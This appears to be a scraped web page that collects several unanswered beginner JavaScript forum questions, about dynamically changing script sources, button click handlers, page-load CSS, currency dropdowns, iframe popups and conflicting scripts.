JavaScript - Can't Change Scripts Source Dynamically
Hi,
I try to change script source dynamically. When I use the following code, it works fine, and the script is executed Code: <script type="text/javascript">

However when I use the following code, it doesn't work, the script isn't executed Code: <script type="text/javascript">

The only difference between the codes is that in the first code I use constant sting, and in the second code I use variable, in order to make the source dynamic. Please help me to solve this problem. I have that taken care of but once the page is loaded I need to change the source to a link with in the page. My guess is I need something to execute the code like a onload or something. Thank you. Hi - I'm working in ASP.Net 2.0. My page has a GridView control, which is populated by a SQLDataSource. The GridView has one Button control per row. The button has a client-side javascript function (ShowDelete) attached to its OnClientClick event on DataBinding of the GridView. This event fires some javascript. The javascript does 3 things: - It changes the text of the button from "Hide" to "Create" - It changes the background color of the button from red to green - It assigns a new onClientClick event to the button: "ShowAvailable" The text and the color of the button change with no problem. After I change the OnClientClick event, I send an alert with the button's OnClientClick event and it reports it to be "ShowAvailable". However, when I click on the button, it doesn't fire ShowAvailable, it fires the original onClientClick event (ShowDelete). Also, when I do View Source, it shows the button's text, color and OnClientClick event as their original settings, i.e., "Hidden", "Red" and "ShowDelete", even though I'm looking at a green button that says "Create." Any thoughts are greatly appreciated! I'm developing a site for my wife's acupuncture practice (http://www.acupunctuurfengyun.be. Since I have two monitors (one wide screen, one square) attached to my computer I can verify how it will look in different resolutions. While doing so I came across a nasty thing: in some resolutions the content div is very small and not using all of the full browser window (left after the header section). Is it possible to make a change to the CSS min-height and max-height while the page is being loaded? I've looked into lots of samples but all depend on a click or mouse over event and didn't want to work with onload in the body tag. I've also thought about putting the stuff in the PHP part of my code but I am lost at this moment on how to do this. Could someone help me out here? Hello, I have been looking for this all day - Change currencies throughout the page when choosing between countries or currencies from dropdown menu. What I basically need is a dropdown menu which shows countries or currencies. When you select anyone of it like USD all the prices throughout the page are changed to USD. Now if you change it AUD/CAD/PKR etc they will be changed accordingly. A very good example of this is: http://creativeon.com. When you change currency from right top dropdown menu - it changes the currencies of all the packages in the main content. I am a HTML developer and do not know much about javascripting. I want to be able to display a table of images, all the same size, click on any one and show a corresponding htm pages in an iframe, click outside the ifram or on it to close it; click on another image and on and on... So far, I am able to hide the initial iframe and/or display it inline but am unable to show it above the table that holds the images. It is not difficult to do this using screen-captured images of the htm pages but I am looking for a dynamic way of doing this either with javascript or php or just plain html. Very new to Javascript (been a HTML/CSS guy for a while, but never really got into more than tinkering with other other people's Javascript coding), but I came across a situation I can't find canned coding for, and trying to create it from bits and pieces I Googled has led me to a dead-end. In summary, I have a website that I frequently visit (FWIW, Firefox 3.x is my browser of choice) with many image sources referring to URLs that end with "-thumbnail.jpg". However, for better image quality, I am trying to use Greasemonkey to replace all instances of "-thumbnail.jpg" in the source of images on this site with "-bigthumbnail.jpg". The closest I could think of was to somehow use getElementsByTagName and innerHTML.replace, but realized that innerHTML does not do HTML, only content. The purpose of the first code is to display a "State or Province" input field and cause the "State" dropdown box to disappear when any other country than USA is selected from the country_code dropdown box. The second piece of code has the same purpose, except that it is for the shipping_country_code dropdown box. These codes work individually, but when I put them both between the head tags, only the second one works. How would I put these together to make them both work on the same page? Hi Chaps, I had a two similar scripts that uses a select option to pass a parameter to a php page, then returns options/values to a seperate select drop down. Both of these scripts worked fine until I added another script. The new script is different, in that it checks the value of the original select option, then passes that value to a seperate php page, then, if a condition is met, an input field is displayed. This new script works, but has resulted in the two original scripts doubling the values that they return. I hope that makes sense, if anyone can spare anytime, I'll gladly post the code and any other information . . . . I have a situation where 2 scripts run perfectly when run independently - the first one loads up a "video", running at 30 fps, made up of images, the second one uses accelerometer data from the iPhone to throw a blue sphere around the screen, depending on movement of the iPhone. However, when I put these 2 scripts inside one HTML page, the "video" runs, but the blue sphere is "frozen" - but the scripts are still the same (one inside the head, as before, and the other in the body, again as before) How can I get them to run in a parallel way?
